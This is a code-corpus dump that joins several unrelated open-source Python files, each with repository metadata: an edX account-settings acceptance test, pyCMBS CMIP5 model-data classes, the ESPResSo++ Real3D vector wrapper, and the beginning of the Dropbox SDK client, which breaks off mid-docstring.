[u'me@here.com', u'you@there.com'],
success_message='Click the link in the message to update your email address.',
assert_after_reload=False
)
actual_events = self.wait_for_events(
event_filter=self.settings_change_initiated_event_filter, number_of_matches=2)
self.assert_events_match(
[
self.expected_settings_change_initiated_event(
'email', email, 'me@here.com', username=username, user_id=user_id),
# NOTE the first email change was never confirmed, so old has not changed.
self.expected_settings_change_initiated_event(
'email', email, 'you@there.com', username=username, user_id=user_id),
],
actual_events
)
# Email is not saved until user confirms, so no events should have been
# emitted.
self.assert_no_setting_changed_event()
def test_password_field(self):
"""
Test behaviour of "Password" field.
"""
self._test_link_field(
u'password',
u'Password',
u'Reset Password',
success_message='Click the link in the message to reset your password.',
)
event_filter = self.expected_settings_change_initiated_event('password', None, None)
self.wait_for_events(event_filter=event_filter, number_of_matches=1)
# Like email, since the user has not confirmed their password change,
# the field has not yet changed, so no events will have been emitted.
self.assert_no_setting_changed_event()
@skip(
'On bokchoy test servers, language changes take a few reloads to fully realize '
'which means we can no longer reliably match the strings in the html in other tests.'
)
def test_language_field(self):
"""
Test behaviour of "Language" field.
"""
self._test_dropdown_field(
u'pref-lang',
u'Language',
u'English',
[u'Dummy Language (Esperanto)', u'English'],
reloads_on_save=True,
)
def test_education_completed_field(self):
"""
Test behaviour of "Education Completed" field.
"""
self._test_dropdown_field(
u'level_of_education',
u'Education Completed',
u'',
[u'Bachelor\'s degree', u''],
)
actual_events = self.wait_for_events(event_filter=self.settings_changed_event_filter, number_of_matches=2)
self.assert_events_match(
[
self.expected_settings_changed_event('level_of_education', None, 'b'),
self.expected_settings_changed_event('level_of_education', 'b', None),
],
actual_events
)
def test_gender_field(self):
"""
Test behaviour of "Gender" field.
"""
self._test_dropdown_field(
u'gender',
u'Gender',
u'',
[u'Female', u''],
)
actual_events = self.wait_for_events(event_filter=self.settings_changed_event_filter, number_of_matches=2)
self.assert_events_match(
[
self.expected_settings_changed_event('gender', None, 'f'),
self.expected_settings_changed_event('gender', 'f', None),
],
actual_events
)
def test_year_of_birth_field(self):
"""
Test behaviour of "Year of Birth" field.
"""
# Note that when we clear the year_of_birth here we're firing an event.
self.assertEqual(self.account_settings_page.value_for_dropdown_field('year_of_birth', ''), '')
expected_events = [
self.expected_settings_changed_event('year_of_birth', None, 1980),
self.expected_settings_changed_event('year_of_birth', 1980, None),
]
with self.assert_events_match_during(self.settings_changed_event_filter, expected_events):
self._test_dropdown_field(
u'year_of_birth',
u'Year of Birth',
u'',
[u'1980', u''],
)
def test_country_field(self):
"""
Test behaviour of "Country or Region" field.
"""
self._test_dropdown_field(
u'country',
u'Country or Region',
u'',
[u'Pakistan', u'Palau'],
)
def test_preferred_language_field(self):
"""
Test behaviour of "Preferred Language" field.
"""
self._test_dropdown_field(
u'language_proficiencies',
u'Preferred Language',
u'',
[u'Pushto', u''],
)
actual_events = self.wait_for_events(event_filter=self.settings_changed_event_filter, number_of_matches=2)
self.assert_events_match(
[
self.expected_settings_changed_event(
'language_proficiencies', [], [{'code': 'ps'}], table='student_languageproficiency'),
self.expected_settings_changed_event(
'language_proficiencies', [{'code': 'ps'}], [], table='student_languageproficiency'),
],
actual_events
)
def test_connected_accounts(self):
"""
Test that fields for third party auth providers exist.
Currently there is no way to test the whole authentication process
because that would require accounts with the providers.
"""
providers = (
['auth-oa2-facebook', 'Facebook', 'Link'],
['auth-oa2-google-oauth2', 'Google', 'Link'],
)
for field_id, title, link_title in providers:
self.assertEqual(self.account_settings_page.title_for_field(field_id), title)
self.assertEqual(self.account_settings_page.link_title_for_link_field(field_id), link_title)
@attr('a11y')
class AccountSettingsA11yTest(AccountSettingsTestMixin, WebAppTest):
"""
Class to test account settings accessibility.
"""
def test_account_settings_a11y(self):
"""
Test the accessibility of the account settings page.
"""
self.log_in_as_unique_user()
self.visit_account_settings_page()
self.account_settings_page.a11y_audit.config.set_rules({
'ignore': [
'link-href', # TODO: AC-233
],
})
self.account_settings_page.a11y_audit.check_for_accessibility_errors()
|
devs1991/test_edx_docmode
|
common/test/acceptance/tests/lms/test_account_settings.py
|
Python
|
agpl-3.0
| 17,612
|
[
"VisIt"
] |
b5ae131d765b0a391f06f6b025a20ac0a5aefbb1d6c032680b0b7087e49d9cbd
|
# -*- coding: utf-8 -*-
"""
This file is part of pyCMBS.
(c) 2012- Alexander Loew
For COPYING and LICENSE details, please refer to the LICENSE file
"""
from cdo import Cdo
from pycmbs.data import Data
import tempfile as tempfile
import copy
import glob
import os
import sys
import ast
import numpy as np
from pycmbs.benchmarking import preprocessor
from pycmbs.benchmarking.utils import get_T63_landseamask, get_temporary_directory
from pycmbs.benchmarking.models.model_basic import *
from pycmbs.utils import print_log, WARNING
class CMIP5Data(Model):
"""
Class for CMIP5 model simulations. This class is derived from C{Model}.
"""
def __init__(self, data_dir, model, experiment, dic_variables, name='', shift_lon=False, **kwargs):
"""
Parameters
----------
data_dir : str
directory that specifies the root directory where the data is located
model : TBD todo
experiment : str
specifies the ID of the experiment
dic_variables : TODO
name : str
name of model
shift_lon : bool
specifies if longitudes of data need to be shifted
kwargs : dict
other keyword arguments
"""
if name == '':
name = model
super(CMIP5Data, self).__init__(data_dir, dic_variables, name=name, shift_lon=shift_lon, **kwargs)
self.model = model
self.experiment = experiment
self.data_dir = data_dir
self.shift_lon = shift_lon
self.type = 'CMIP5'
self._unique_name = self._get_unique_name()
def _get_unique_name(self):
"""
get unique name from model and experiment
Returns
-------
string with unique combination of models and experiment
"""
s = self.model.replace(' ', '') + '-' + self.experiment.replace(' ', '')
s = s.replace('#', '-')
if hasattr(self, 'ens_member'):
s += '-' + str(self.ens_member)
return s
def get_rainfall_data(self, interval='season', **kwargs):
return self.get_model_data_generic(interval=interval, **kwargs)
def get_wind(self, interval='season', **kwargs):
return self.get_model_data_generic(interval=interval, **kwargs)
def get_evaporation(self, interval='season', **kwargs):
return self.get_model_data_generic(interval=interval, **kwargs)
def get_latent_heat_flux(self, interval='season', **kwargs):
return self.get_model_data_generic(interval=interval, **kwargs)
def get_model_data_generic(self, interval='season', **kwargs):
"""
unique parameters are:
filename - file basename
variable - name of the variable as the short_name in the netcdf file
kwargs is a dictionary with keys for each model. Then a dictionary with properties follows
"""
if not self.type in kwargs.keys():
print ''
print 'WARNING: it is not possible to get data using generic function, as method missing: ', self.type, kwargs.keys()
assert False
locdict = kwargs[self.type]
# read settings and details from the keyword arguments
# no defaults; everything should be explicitely specified in either the config file or the dictionaries
varname = locdict.pop('variable', None)
#~ print self.type
#~ print locdict.keys()
assert varname is not None, 'ERROR: provide varname!'
units = locdict.pop('unit', None)
assert units is not None, 'ERROR: provide unit!'
lat_name = locdict.pop('lat_name', 'lat')
lon_name = locdict.pop('lon_name', 'lon')
model_suffix = locdict.pop('model_suffix', None)
model_prefix = locdict.pop('model_prefix', None)
file_format = locdict.pop('file_format')
scf = locdict.pop('scale_factor')
valid_mask = locdict.pop('valid_mask')
custom_path = locdict.pop('custom_path', None)
thelevel = locdict.pop('level', None)
target_grid = self._actplot_options['targetgrid']
interpolation = self._actplot_options['interpolation']
if custom_path is None:
filename1 = self.get_raw_filename(varname, **kwargs) # routine needs to be implemented by each subclass
else:
filename1 = custom_path + self.get_raw_filename(varname, **kwargs)
if filename1 is None:
print_log(WARNING, 'No valid model input data')
return None
force_calc = False
if self.start_time is None:
raise ValueError('Start time needs to be specified')
if self.stop_time is None:
raise ValueError('Stop time needs to be specified')
#/// PREPROCESSING ///
cdo = Cdo()
s_start_time = str(self.start_time)[0:10]
s_stop_time = str(self.stop_time)[0:10]
#1) select timeperiod and generate monthly mean file
if target_grid == 't63grid':
gridtok = 'T63'
else:
gridtok = 'SPECIAL_GRID'
file_monthly = filename1[:-3] + '_' + s_start_time + '_' + s_stop_time + '_' + gridtok + '_monmean.nc' # target filename
file_monthly = get_temporary_directory() + os.path.basename(file_monthly)
sys.stdout.write('\n *** Model file monthly: %s\n' % file_monthly)
if not os.path.exists(filename1):
print 'WARNING: File not existing: ' + filename1
return None
cdo.monmean(options='-f nc', output=file_monthly, input='-' + interpolation + ',' + target_grid + ' -seldate,' + s_start_time + ',' + s_stop_time + ' ' + filename1, force=force_calc)
sys.stdout.write('\n *** Reading model data... \n')
sys.stdout.write(' Interval: ' + interval + '\n')
#2) calculate monthly or seasonal climatology
if interval == 'monthly':
mdata_clim_file = file_monthly[:-3] + '_ymonmean.nc'
mdata_sum_file = file_monthly[:-3] + '_ymonsum.nc'
mdata_N_file = file_monthly[:-3] + '_ymonN.nc'
mdata_clim_std_file = file_monthly[:-3] + '_ymonstd.nc'
cdo.ymonmean(options='-f nc -b 32', output=mdata_clim_file, input=file_monthly, force=force_calc)
cdo.ymonsum(options='-f nc -b 32', output=mdata_sum_file, input=file_monthly, force=force_calc)
cdo.ymonstd(options='-f nc -b 32', output=mdata_clim_std_file, input=file_monthly, force=force_calc)
cdo.div(options='-f nc', output=mdata_N_file, input=mdata_sum_file + ' ' + mdata_clim_file, force=force_calc) # number of samples
elif interval == 'season':
mdata_clim_file = file_monthly[:-3] + '_yseasmean.nc'
mdata_sum_file = file_monthly[:-3] + '_yseassum.nc'
mdata_N_file = file_monthly[:-3] + '_yseasN.nc'
mdata_clim_std_file = file_monthly[:-3] + '_yseasstd.nc'
cdo.yseasmean(options='-f nc -b 32', output=mdata_clim_file, input=file_monthly, force=force_calc)
cdo.yseassum(options='-f nc -b 32', output=mdata_sum_file, input=file_monthly, force=force_calc)
cdo.yseasstd(options='-f nc -b 32', output=mdata_clim_std_file, input=file_monthly, force=force_calc)
cdo.div(options='-f nc -b 32', output=mdata_N_file, input=mdata_sum_file + ' ' + mdata_clim_file, force=force_calc) # number of samples
else:
raise ValueError('Unknown temporal interval. Can not perform preprocessing!')
if not os.path.exists(mdata_clim_file):
return None
#3) read data
if interval == 'monthly':
thetime_cylce = 12
elif interval == 'season':
thetime_cylce = 4
else:
print interval
raise ValueError('Unsupported interval!')
mdata = Data(mdata_clim_file, varname, read=True, label=self._unique_name, unit=units, lat_name=lat_name, lon_name=lon_name, shift_lon=False, scale_factor=scf, level=thelevel, time_cycle=thetime_cylce)
mdata_std = Data(mdata_clim_std_file, varname, read=True, label=self._unique_name + ' std', unit='-', lat_name=lat_name, lon_name=lon_name, shift_lon=False, level=thelevel, time_cycle=thetime_cylce)
mdata.std = mdata_std.data.copy()
del mdata_std
mdata_N = Data(mdata_N_file, varname, read=True, label=self._unique_name + ' std', unit='-', lat_name=lat_name, lon_name=lon_name, shift_lon=False, scale_factor=scf, level=thelevel)
mdata.n = mdata_N.data.copy()
del mdata_N
# ensure that climatology always starts with January, therefore set date and then sort
mdata.adjust_time(year=1700, day=15) # set arbitrary time for climatology
mdata.timsort()
#4) read monthly data
mdata_all = Data(file_monthly, varname, read=True, label=self._unique_name, unit=units, lat_name=lat_name, lon_name=lon_name, shift_lon=False, time_cycle=12, scale_factor=scf, level=thelevel)
mdata_all.adjust_time(day=15)
#mask_antarctica masks everything below 60 degrees S.
#here we only mask Antarctica, if only LAND points shall be used
if valid_mask == 'land':
mask_antarctica = True
elif valid_mask == 'ocean':
mask_antarctica = False
else:
mask_antarctica = False
if target_grid == 't63grid':
mdata._apply_mask(get_T63_landseamask(False, area=valid_mask, mask_antarctica=mask_antarctica))
mdata_all._apply_mask(get_T63_landseamask(False, area=valid_mask, mask_antarctica=mask_antarctica))
else:
tmpmsk = get_generic_landseamask(False, area=valid_mask, target_grid=target_grid, mask_antarctica=mask_antarctica)
mdata._apply_mask(tmpmsk)
mdata_all._apply_mask(tmpmsk)
del tmpmsk
mdata_mean = mdata_all.fldmean()
mdata._raw_filename = filename1
mdata._monthly_filename = file_monthly
mdata._clim_filename = mdata_clim_file
mdata._varname = varname
# return data as a tuple list
retval = (mdata_all.time, mdata_mean, mdata_all)
del mdata_all
return mdata, retval
def get_temperature_2m(self, interval='monthly', **kwargs):
return self.get_model_data_generic(interval=interval, **kwargs)
def get_surface_shortwave_radiation_down(self, interval='monthly', **kwargs):
return self.get_model_data_generic(interval=interval, **kwargs)
def get_surface_shortwave_radiation_up(self, interval='monthly', **kwargs):
return self.get_model_data_generic(interval=interval, **kwargs)
def get_albedo(self, interval='season', dic_up=None, dic_down=None):
"""
calculate albedo as ratio of upward and downwelling fluxes
first the monthly mean fluxes are used to calculate the albedo,
As the usage of different variables requires knowledge of the configuration of
the input streams, these need to be provided in addition
Parameters
----------
dic_up : dict
dictionary for get_surface_shortwave_radiation_up() as specified in model_data_routines.json
dic_down : dict
dictionary for get_surface_shortwave_radiation_down() as specified in model_data_routines.json
"""
assert dic_up is not None, 'ERROR: dic_up needed'
assert dic_down is not None, 'ERROR: dic_down needed'
force_calc = False
# read land-sea mask
#~ ls_mask = get_T63_landseamask(self.shift_lon)
#~ target grid ??? valid mask ????
def _extract_dict_from_routine_name(k, s):
# extract dictionary name from routine name in model_data_routines.json
res = ast.literal_eval(s[k].split('**')[1].rstrip()[:-1])
#~ print res, type(res)
return res
# extract coniguration dictionaries for flues from model_data_routines
kw_up = _extract_dict_from_routine_name('surface_upward_flux', dic_up)
kw_down = _extract_dict_from_routine_name('sis', dic_down)
if self.start_time is None:
raise ValueError('Start time needs to be specified')
if self.stop_time is None:
raise ValueError('Stop time needs to be specified')
# get fluxes
Fu = self.get_surface_shortwave_radiation_up(interval=interval, **kw_up)
if Fu is None:
print 'File not existing for UPWARD flux!: ', self.name
return None
else:
Fu_i = Fu[0]
lab = Fu_i._get_label()
Fd = self.get_surface_shortwave_radiation_down(interval=interval, **kw_down)
if Fd is None:
print 'File not existing for DOWNWARD flux!: ', self.name
return None
else:
Fd_i = Fd[0]
# albedo for chosen interval as caluclated as ratio of means of fluxes in that interval (e.g. season, months)
Fu_i.div(Fd_i, copy=False)
del Fd_i # Fu contains now the albedo
#~ Fu_i._apply_mask(ls_mask.data)
#albedo for monthly data (needed for global mean plots )
Fu_m = Fu[1][2]
del Fu
Fd_m = Fd[1][2]
del Fd
Fu_m.div(Fd_m, copy=False)
del Fd_m
#~ Fu_m._apply_mask(ls_mask.data)
Fu_m._set_valid_range(0., 1.)
Fu_m.label = lab + ' albedo'
Fu_i.label = lab + ' albedo'
Fu_m.unit = '-'
Fu_i.unit = '-'
# center dates of months
Fu_m.adjust_time(day=15)
Fu_i.adjust_time(day=15)
# return data as a tuple list
retval = (Fu_m.time, Fu_m.fldmean(), Fu_m)
return Fu_i, retval
class CMIP5RAWData(CMIP5Data):
"""
This class is supposed to use CMIP5 data in RAW format.
This means that it builds on the CMORIZED CMIP5 data, but
performs all necessary preprocessing step like e.g. calculation
of ensemble means
"""
def __init__(self, data_dir, model, experiment, dic_variables, name='', shift_lon=False, **kwargs):
super(CMIP5RAWData, self).__init__(data_dir, model, experiment, dic_variables, name=name, shift_lon=shift_lon, **kwargs)
self.model = model
self.experiment = experiment
self.data_dir = data_dir
self.shift_lon = shift_lon
self.type = 'CMIP5RAW'
self._unique_name = self._get_unique_name()
def get_raw_filename(self, varname, **kwargs):
mip = kwargs[self.type].pop('mip', None)
assert mip is not None, 'ERROR: <mip> needs to be provided (CMIP5RAWSINGLE)'
realm = kwargs[self.type].pop('realm')
assert realm is not None, 'ERROR: <realm> needs to be provided (CMIP5RAWSINGLE)'
return self._get_ensemble_filename(varname, mip, realm)
def _get_ensemble_filename(self, the_variable, mip, realm):
"""
get filename of ensemble mean file
if required, then all pre-processing steps are done
Parameters
----------
the_variable : str
variable name to be processed
Returns
-------
returns filename of file with multi-ensemble means
"""
# use model parser to generate a list of available institutes and
# models from data directory
data_dir = self.data_dir
if data_dir[-1] != os.sep:
data_dir += os.sep
CMP = preprocessor.CMIP5ModelParser(self.data_dir)
model_list = CMP.get_all_models()
# model name in configuration file is assumed to be INSTITUTE:MODEL
institute = self.model.split(':')[0]
model = self.model.split(':')[1]
# TODO why is the institute not in the model output name ???
output_file = get_temporary_directory() + the_variable + '_' + mip + '_' + model + '_' + self.experiment + '_ensmean.nc'
if institute not in model_list.keys():
raise ValueError('Data for this institute is not existing: %s' % institute)
# do preprocessing of data from multiple ensembles if file
# already existing, then no processing is done
C5PP = preprocessor.CMIP5Preprocessor(data_dir, output_file,
the_variable, model,
self.experiment,
institute=institute, mip=mip, realm=realm)
# calculate the ensemble mean and store as file
# also the STDV is calculated on the fly calculated
# resulting filenames are available by C5PP.outfile_ensmean and C5PP.outfile_ensstd
C5PP.ensemble_mean(delete=False,
start_time=self.start_time,
stop_time=self.stop_time)
return C5PP.outfile_ensmean
class CMIP5RAW_SINGLE(CMIP5RAWData):
"""
This class is supposed to use CMIP5 data in RAW format.
It is supposed to handle single emsemble members
"""
def __init__(self, data_dir, model, experiment, dic_variables, name='', shift_lon=False, **kwargs):
"""
Parameters
----------
model_type : str
model type like specified in the configuration file. It is
supossed to be of format MPI-M:MPI-ESM-LR#1 etc.
where after # there needs to be an integer number specifying
the emsemble member number
"""
if name == '':
name = model
# split between model type and ensemble member
s = model.split('#')
if len(s) != 2:
print model, s
raise ValueError('ERROR: invalid ensemble member specification')
else:
model = s[0]
self.ens_member = int(s[1])
self.institute = model.split(':')[0]
super(CMIP5RAWData, self).__init__(data_dir, model, experiment, dic_variables, name=name, shift_lon=shift_lon, **kwargs)
self.model = model
self.experiment = experiment
self.data_dir = data_dir
self.shift_lon = shift_lon
self.type = 'CMIP5RAWSINGLE'
self._unique_name = self._get_unique_name()
def get_raw_filename(self, variable, **kwargs):
"""
return RAW filename for class CMIP5RAWSINGLE
"""
# information comes from model_data_routines.json
mip = kwargs[self.type].pop('mip', None)
assert mip is not None, 'ERROR: <mip> needs to be provided (CMIP5RAWSINGLE)'
realm = kwargs[self.type].pop('realm')
assert realm is not None, 'ERROR: <realm> needs to be provided (CMIP5RAWSINGLE)'
temporal_resolution = kwargs[self.type].pop('temporal_resolution')
assert temporal_resolution is not None, 'ERROR: <temporal_resolution> needs to be provided (CMIP5RAWSINGLE)'
data_dir = self.data_dir
if data_dir[-1] != os.sep:
data_dir += os.sep
model = self.model.split(':')[1]
fp = data_dir + self.institute + os.sep + model + os.sep + self.experiment + os.sep + temporal_resolution + os.sep + realm + os.sep + mip + os.sep + 'r' + str(self.ens_member) + 'i1p1' + os.sep + variable + os.sep + variable + '_' + mip + '_' + model + '_' + self.experiment + '_r' + str(self.ens_member) + 'i1p1_*.nc'
files = glob.glob(fp)
if len(files) == 0:
return None
if len(files) != 1:
print files
raise ValueError('More than one file found!')
return files[0]
class CMIP3Data(CMIP5Data):
"""
Class for CMIP3 model simulations. This class is derived from C{Model}.
"""
def __init__(self, data_dir, model, experiment, dic_variables, name='', shift_lon=False, **kwargs):
"""
Parameters
----------
data_dir: directory that specifies the root directory where the data is located
model: TBD tood
experiment: specifies the ID of the experiment (str)
dic_variables:
name: TBD todo
shift_lon: specifies if longitudes of data need to be shifted
kwargs: other keyword arguments
"""
super(CMIP3Data, self).__init__(data_dir, model, experiment, dic_variables, name=model, shift_lon=shift_lon, **kwargs)
self.model = model
self.experiment = experiment
self.data_dir = data_dir
self.shift_lon = shift_lon
self.type = 'CMIP3'
self._unique_name = self._get_unique_name()
|
pygeo/pycmbs
|
pycmbs/benchmarking/models/cmip5.py
|
Python
|
mit
| 20,505
|
[
"NetCDF"
] |
239baabaaa68802993926ffab0b3fc5bd297bf29429f69c7d9483a0087004cda
|
# Copyright (C) 2012,2013
# Max Planck Institute for Polymer Research
# Copyright (C) 2008,2009,2010,2011
# Max-Planck-Institute for Polymer Research & Fraunhofer SCAI
#
# This file is part of ESPResSo++.
#
# ESPResSo++ is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ESPResSo++ is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
*******************
**espresso.Real3D**
*******************
"""
from _espresso import Real3D
from espresso import esutil
# This injects additional methods into the Real3D class and pulls it
# into this module
class __Real3D(Real3D) :
"""Basic 3D floating point vector as used by ESPResSo++.
"""
__metaclass__ = esutil.ExtendBaseClass
__originit = Real3D.__init__
def __init__(self, *args):
if len(args) == 0:
x = y = z = 0.0
elif len(args) == 1:
arg0 = args[0]
if isinstance(arg0, Real3D):
x = arg0.x
y = arg0.y
z = arg0.z
# test whether the argument is iterable and has 3 elements
elif hasattr(arg0, '__iter__') and len(arg0) == 3:
x, y, z = arg0
elif isinstance(arg0, float) or isinstance(arg0, int):
x = y = z = arg0
else :
raise TypeError("Cannot initialize Real3D from %s" % (args))
elif len(args) == 3 :
x, y, z = args
else :
raise TypeError("Cannot initialize Real3D from %s" % (args))
return self.__originit(x, y, z)
# create setters and getters
@property
def x(self): return self[0]
@x.setter
def x(self, v): self[0] = v
@property
def y(self) : return self[1]
@y.setter
def y(self, v) : self[1] = v
@property
def z(self) : return self[2]
@z.setter
def z(self, v) : self[2] = v
# string conversion
def __str__(self) :
return str((self[0], self[1], self[2]))
def __repr__(self) :
return 'Real3D' + str(self)
def toReal3DFromVector(*args):
"""Try to convert the arguments to a Real3D.
This function will only convert to a Real3D if x, y and z are
specified."""
if len(args) == 1:
arg0 = args[0]
if isinstance(arg0, Real3D):
return arg0
elif hasattr(arg0, '__iter__') and len(arg0) == 3:
return Real3D(*args)
elif len(args) == 3:
return Real3D(*args)
raise TypeError("Specify x, y and z.")
def toReal3D(*args):
"""Try to convert the arguments to a Real3D, returns the argument,
if it is already a Real3D."""
if len(args) == 1 and isinstance(args[0], Real3D):
return args[0]
else:
return Real3D(*args)
|
BackupTheBerlios/espressopp
|
src/Real3D.py
|
Python
|
gpl-3.0
| 3,262
|
[
"ESPResSo"
] |
57a3b9b43297f0bb8e87ae576f2976bd298fc8c47b13b54e72b361678be7570f
|
from __future__ import absolute_import
import base64
import re
import os
import sys
import urllib
PY3 = sys.version_info[0] == 3
if PY3:
from io import StringIO
basestring = str
else:
from StringIO import StringIO
try:
import json
except ImportError:
import simplejson as json
from .rest import ErrorResponse, RESTClient, params_to_urlencoded
from .session import BaseSession, DropboxSession, DropboxOAuth2Session
def format_path(path):
"""Normalize path for use with the Dropbox API.
This function turns multiple adjacent slashes into single
slashes, then ensures that there's a leading slash but
not a trailing slash.
"""
if not path:
return path
path = re.sub(r'/+', '/', path)
if path == '/':
return (u"" if isinstance(path, unicode) else "")
else:
return '/' + path.strip('/')
class DropboxClient(object):
"""
This class lets you make Dropbox API calls. You'll need to obtain an
OAuth 2 access token first. You can get an access token using either
:class:`DropboxOAuth2Flow` or :class:`DropboxOAuth2FlowNoRedirect`.
All of the API call methods can raise a :class:`dropbox.rest.ErrorResponse` exception if
the server returns a non-200 or invalid HTTP response. Note that a 401
return status at any point indicates that the access token you're using
is no longer valid and the user must be put through the OAuth 2
authorization flow again.
"""
def __init__(self, oauth2_access_token, locale=None, rest_client=None):
"""Construct a ``DropboxClient`` instance.
Parameters
oauth2_access_token
An OAuth 2 access token (string). For backwards compatibility this may
also be a DropboxSession object (see :meth:`create_oauth2_access_token()`).
locale
The locale of the user of your application. For example "en" or "en_US".
Some API calls return localized data and error messages; this setting
tells the server which locale to use. By default, the server uses "en_US".
rest_client
Optional :class:`dropbox.rest.RESTClient`-like object to use for making
requests.
"""
if rest_client is None: rest_client = RESTClient
if isinstance(oauth2_access_token, basestring):
if not _OAUTH2_ACCESS_TOKEN_PATTERN.match(oauth2_access_token):
raise ValueError("invalid format for oauth2_access_token: %r"
% (oauth2_access_token,))
self.session = DropboxOAuth2Session(oauth2_access_token, locale)
elif isinstance(oauth2_access_token, DropboxSession):
# Backwards compatibility with OAuth 1
if locale is not None:
raise ValueError("The 'locale' parameter to DropboxClient is only useful "
"when also passing in an OAuth 2 access token")
self.session = oauth2_access_token
else:
raise ValueError("'oauth2_access_token' must either be a string or a DropboxSession")
self.rest_client = rest_client
def request(self, target, params=None, method='POST',
content_server=False, notification_server=False):
"""
An internal method that builds the url, headers, and params for a Dropbox API request.
It is exposed if you need to make API calls not implemented in this library or if you
need to debug requests.
Parameters
target
The target URL with leading slash (e.g. '/files').
params
A dictionary of parameters to add to the request.
method
An HTTP method (e.g. 'GET' or 'POST').
content_server
A boolean indicating whether the request is to the
API content server, for example to fetch the contents of a file
rather than its metadata.
notification_server
A boolean indicating whether the request is to the API notification
server, for example for longpolling.
Returns
A tuple of ``(url, params, headers)`` that should be used to make the request.
OAuth will be added as needed within these fields.
"""
assert method in ['GET','POST', 'PUT'], "Only 'GET', 'POST', and 'PUT' are allowed."
assert not (content_server and notification_server), \
"Cannot construct request simultaneously for content and notification servers."
if params is None:
params = {}
if content_server:
host = self.session.API_CONTENT_HOST
elif notification_server:
host = self.session.API_NOTIFICATION_HOST
else:
host = self.session.API_HOST
base = self.session.build_url(host, target)
headers, params = self.session.build_access_headers(method, base, params)
if method in ('GET', 'PUT'):
url = self.session.build_url(host, target, params)
else:
url = self.session.build_url(host, target)
return url, params, headers
def account_info(self):
"""Retrieve information about the user's account.
Returns
A dictionary containing account information.
For a detailed description of what this call returns, visit:
https://www.dropbox.com/developers/core/docs#account-info
"""
url, params, headers = self.request("/account/info", method='GET')
return self.rest_client.GET(url, headers)
def disable_access_token(self):
"""
Disable the access token that this ``DropboxClient`` is using. If this call
succeeds, further API calls using this object will fail.
"""
url, params, headers = self.request("/disable_access_token", method='POST')
return self.rest_client.POST(url, params, headers)
def create_oauth2_access_token(self):
"""
If this ``DropboxClient`` was created with an OAuth 1 access token, this method
can be used to create an equivalent OAuth 2 access token. This can be used to
upgrade your app's existing access tokens from OAuth 1 to OAuth 2.
Example::
from dropbox.client import DropboxClient
from dropbox.session import DropboxSession
session = DropboxSession(APP_KEY, APP_SECRET)
access_key, access_secret = '123abc', 'xyz456' # Previously obtained OAuth 1 credentials
session.set_token(access_key, access_secret)
client = DropboxClient(session)
token = client.create_oauth2_access_token()
# Optionally, create a new client using the new token
new_client = DropboxClient(token)
"""
if not isinstance(self.session, DropboxSession):
raise ValueError("This call requires a DropboxClient that is configured with an "
"OAuth 1 access token.")
url, params, headers = self.request("/oauth2/token_from_oauth1", method='POST')
r = self.rest_client.POST(url, params, headers)
return r['access_token']
def get_chunked_uploader(self, file_obj, length):
"""Creates a :class:`ChunkedUploader` to upload the given file-like object.
Parameters
file_obj
The file-like object which is the source of the data
being uploaded.
length
The number of bytes to upload.
The expected use of this function is as follows::
bigFile = open("data.txt", 'rb')
uploader = myclient.get_chunked_uploader(bigFile, size)
print "uploading: ", size
while uploader.offset < size:
try:
upload = uploader.upload_chunked()
except rest.ErrorResponse, e:
# perform error handling and retry logic
uploader.finish('/bigFile.txt')
The SDK leaves the error handling and retry logic to the developer
to implement, as the exact requirements will depend on the application
involved.
"""
return ChunkedUploader(self, file_obj, length)
def upload_chunk(self, file_obj, length=None, offset=0, upload_id=None):
"""Uploads a single chunk of data from a string or file-like object. The majority of users
should use the :class:`ChunkedUploader` object, which provides a simpler interface to the
chunked_upload API endpoint.
Parameters
file_obj
The source of the chunk to upload; a file-like object or a string.
length
This argument is ignored but still present for backward compatibility reasons.
offset
The byte offset to which this source data corresponds in the original file.
upload_id
The upload identifier for which this chunk should be uploaded,
returned by a previous call, or None to start a new upload.
Returns
A dictionary containing the keys:
upload_id
A string used to identify the upload for subsequent calls to :meth:`upload_chunk()`
and :meth:`commit_chunked_upload()`.
offset
The offset at which the next upload should be applied.
expires
The time after which this partial upload is invalid.
"""
params = dict()
if upload_id:
params['upload_id'] = upload_id
params['offset'] = offset
url, ignored_params, headers = self.request("/chunked_upload", params,
method='PUT', content_server=True)
try:
reply = self.rest_client.PUT(url, file_obj, headers)
return reply['offset'], reply['upload_id']
except ErrorResponse as e:
raise e
def commit_chunked_upload(self, full_path, upload_id, overwrite=False, parent_rev=None):
"""Commit the previously uploaded chunks for the given path.
Parameters
full_path
The full path to which the chunks are uploaded, *including the file name*.
If the destination folder does not yet exist, it will be created.
upload_id
The chunked upload identifier, previously returned from upload_chunk.
overwrite
Whether to overwrite an existing file at the given path. (Default ``False``.)
If overwrite is False and a file already exists there, Dropbox
will rename the upload to make sure it doesn't overwrite anything.
You need to check the metadata returned for the new name.
This field should only be True if your intent is to potentially
clobber changes to a file that you don't know about.
parent_rev
Optional rev field from the 'parent' of this upload.
If your intent is to update the file at the given path, you should
pass the parent_rev parameter set to the rev value from the most recent
metadata you have of the existing file at that path. If the server
has a more recent version of the file at the specified path, it will
automatically rename your uploaded file, spinning off a conflict.
Using this parameter effectively causes the overwrite parameter to be ignored.
The file will always be overwritten if you send the most recent parent_rev,
and it will never be overwritten if you send a less recent one.
Returns
A dictionary containing the metadata of the newly committed file.
For a detailed description of what this call returns, visit:
https://www.dropbox.com/developers/core/docs#commit-chunked-upload
"""
params = {
'upload_id': upload_id,
'overwrite': overwrite,
}
if parent_rev is not None:
params['parent_rev'] = parent_rev
url, params, headers = self.request("/commit_chunked_upload/%s" % full_path,
params, content_server=True)
return self.rest_client.POST(url, params, headers)
def put_file(self, full_path, file_obj, overwrite=False, parent_rev=None):
"""Upload a file.
A typical use case would be as follows::
f = open('working-draft.txt', 'rb')
response = client.put_file('/magnum-opus.txt', f)
print "uploaded:", response
which would return the metadata of the uploaded file, similar to::
{
'bytes': 77,
'icon': 'page_white_text',
'is_dir': False,
'mime_type': 'text/plain',
'modified': 'Wed, 20 Jul 2011 22:04:50 +0000',
'path': '/magnum-opus.txt',
'rev': '362e2029684fe',
'revision': 221922,
'root': 'dropbox',
'size': '77 bytes',
'thumb_exists': False
}
Parameters
full_path
The full path to upload the file to, *including the file name*.
If the destination folder does not yet exist, it will be created.
file_obj
